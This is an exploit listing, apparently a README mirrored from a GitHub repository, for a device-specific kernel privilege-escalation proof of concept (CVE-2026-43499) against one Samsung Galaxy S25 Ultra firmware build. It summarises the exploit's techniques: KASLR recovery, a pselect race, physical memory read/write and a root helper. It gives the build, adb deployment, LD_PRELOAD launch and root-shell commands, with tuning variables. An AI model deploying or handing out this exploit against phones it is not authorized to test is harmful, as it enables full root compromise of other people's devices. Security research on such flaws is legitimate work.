## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BUSUNG-DEV-CVE-2026-43499-S25U
# PoC для CVE-2026-43499 для Galaxy S25 Ultra
Доказательство концепции для конкретного устройства для CVE-2026-43499 на корейском Samsung Galaxy S25 Ultra.
## Поддерживаемая цель
root@kitploit:~
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages
Смещения и компоновки структур действительны только для указанной прошивки.
## Ссылка
Этот порт основан на:
* NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
* Ревизия апстрима: `b850d3bddc74c3328d5fbcc0568d21962b55d949`
Лицензия Apache License 2.0 апстрима сохранена в LICENSE.
## Изменения порта
* Добавлены смещения и компоновки ядра для `pa3q-S938NKSUACZF1`.
* Добавлено восстановление сдвига KASLR на основе tracefs для этого ядра Samsung.
* Портированы гонка pselect, этап CFI/FOPS и примитив физического чтения/записи.
* Добавлен специфичный для устройства путь `system_unbound_wq` корневого помощника пользовательского режима.
* Добавлены изолированные процессы повторных попыток с последовательностью задержек pselect, настроенной для устройства.
* Сохраняет возвращенные страницы после успеха, чтобы избежать повторного использования живых поддельных объектов.
## Сборка
Установите `ANDROID_NDK_HOME` на Android NDK r29 или совместимый инструментарий:
root@kitploit:~
make -j8
Результаты:
root@kitploit:~
build/cve-2026-43499
build/cve-2026-43499-root
## Развертывание и запуск
root@kitploit:~
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"
Эксплойт по умолчанию использует 16 независимых попыток и базовую задержку pselect в 20 000 микросекунд. Переопределите их при сборе данных о времени:
root@kitploit:~
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
Временная сессия root и сохраненные выделения сохраняются до перезагрузки.
Для установки в один клик и поддержки KernelSU используйте Root My Galaxy.
Используйте только на устройствах, которые вам принадлежат или на тестирование которых вы получили явное разрешение.